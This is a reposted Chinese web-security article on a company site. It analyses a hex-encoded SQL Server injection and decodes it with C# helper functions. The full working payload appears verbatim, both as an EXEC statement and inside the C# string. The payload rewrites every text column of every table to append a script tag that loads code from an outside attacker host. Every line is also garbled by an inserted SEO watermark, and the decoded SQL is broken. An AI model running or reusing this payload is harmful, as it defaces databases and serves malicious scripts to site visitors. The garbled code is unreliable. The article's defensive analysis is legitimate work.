加入收藏 | 设为首页 | 会员中心 | 我要投稿 | 在线留言 | RSS
成网科技业务包括域名空间企业网站制作
 
国际域名com/net/org仅售80元/年
1G独立空间(PHP+MYSQL)仅售600元/年
您当前的位置:首页 > 技术交流 > 网络安全 > 加密解密

SQL Hex Injection 十六进制注入解决方案

时间:2013-05-22 10:22:55  来源:互联网  作者:佚名  点击:

今天朋友遇到一个问题,他的sql server 数据库被执行了一条语句mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
dEcLaRe @s vArChAr(8000) sEt @s=0x6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e223e3c736372697074207372633d687474703a2f2f2536312532452537302537302536442536442536462536462532452536332536453e3c2f7363726970743e3c212d2d27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52 eXeC(@s)--mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
从0x可以看出这是一段十六进制编码的sql语句mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
于是想到将其解码:mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
对于十六进制字符串编码和解码的C# 方法如下:mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设

复制代码代码如下:mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
/// mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
/// 从字符串转换到16进制表示的字符串mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
/// mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
/// mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
/// 编码,如"utf-8","gb2312" mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
/// 是否每字符用逗号分隔 mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
/// mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
public static string ToHex(string s, string charset, bool fenge)mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
{mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
if ((s.Length % 2) != 0)mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
{mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
s += " ";//空格mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
//throw new ArgumentException("s is not valid chinese string!");mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
}mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
System.Text.Encoding chs = System.Text.Encoding.GetEncoding(charset);mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
byte[] bytes = chs.GetBytes(s);mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
string str = "";mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
for (int i = 0; i < bytes.Length; i++)mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
{mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
str += string.Format("{0:X}", bytes[i]);mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
if (fenge && (i != bytes.Length - 1))mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
{mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
str += string.Format("{0}", ",");mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
}mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
}mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
return str.ToLower();mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
}</p><p> /// mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
/// 从16进制转换成utf编码的字符串mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
/// mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
/// mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
/// 编码,如"utf-8","gb2312" mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
/// mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
public static string UnHex(string hex, string charset)mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
{mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
if (hex == null)mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
throw new ArgumentNullException("hex");mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
hex = hex.Replace(",", "");mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
hex = hex.Replace("/n", "");mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
hex = hex.Replace("//", "");mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
hex = hex.Replace(" ", "");mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
if (hex.Length % 2 != 0)mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
{mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
hex += "20";//空格mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
throw new ArgumentException("hex is not a valid number!", "hex");mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
}mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
// 需要将 hex 转换成 byte 数组。 mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
byte[] bytes = new byte[hex.Length / 2];mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
for (int i = 0; i < bytes.Length; i++)mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
{mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
trymWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
{mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
// 每两个字符是一个 byte。 mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
bytes[i] = byte.Parse(hex.Substring(i * 2, 2),mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
System.Globalization.NumberStyles.HexNumber);mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
}mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
catchmWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
{mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
// Rethrow an exception with custom message. mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
throw new ArgumentException("hex is not a valid hex number!", "hex");mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
}mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
}mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
System.Text.Encoding chs = System.Text.Encoding.GetEncoding(charset);</p><p> return chs.GetString(bytes);mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
}mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
于是对这段代码进行解码:mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设

复制代码代码如下:mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
private static void TestHexStringDecode()mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
{mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
string oldSql = "6445634c615265204074207641724368417228323535292c406320764172436841722832353529206445634c615265207441624c655f637572736f5220635572536f5220466f522073456c45635420612e6e416d452c622e6e416d452046724f6d207359734f624a6543745320612c735973436f4c754d6e53206220774865526520612e69443d622e694420416e4420612e78547950653d27752720416e442028622e78547950653d3939206f5220622e78547950653d3335206f5220622e78547950653d323331206f5220622e78547950653d31363729206f50654e207441624c655f637572736f52206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c4063207768696c6528404066457443685f7374617475733d302920624567496e20657865632827557044615465205b272b40742b275d20734574205b272b40632b275d3d727472696d28636f6e7665727428764172436841722c5b272b40632b275d29292b27273c2f7469746c653e223e3c736372697074207372633d687474703a2f2f2536312532452537302537302536442536442536462536462532452536332536453e3c2f7363726970743e3c212d2d27272729206645744368206e6578742046724f6d207441624c655f637572736f5220694e744f2040742c406320654e6420634c6f5365207441624c655f637572736f52206445416c4c6f43615465207441624c655f637572736f52";mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
Console.Write(System.Web.HttpUtility.UrlDecode( UnHex(oldSql, "utf-8").ToLower()));mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
}mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
这样它的原型就现出来了mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设

复制代码代码如下:mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select amWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' andmWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetchmWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
@t '] set [' @c ']=rtrim(convert(varchar,[' @c '])) ''"> ose table_cursor deallocate table_cursormWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
进行注入的人的网址就是a.ppmmoo.cnmWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
大家平时应该多注意这种注入, 可以通过控制对数据库的权限来避免上面这段代码的注入,据朋友介绍此人是在光纤的电脑上注入的,估计用肉鸡,或者服务器~~~mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
另外 http://home2.paulschou.net/tools/xlate/ 这个网址可以对Hex编码的字符串进行解码mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设

mWP成网科技_开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设
成网科技 www.it28.com竭诚为您服务!
开平网站建设_开平网站制作_开平企业网站_开平网页设计_江门网站建设_成网科技

更多
 


来顶一下
返回首页
返回首页
发表评论 共有条评论
用户名: 密码:
验证码: 匿名发表
推荐资讯
相关文章
栏目更新
栏目热门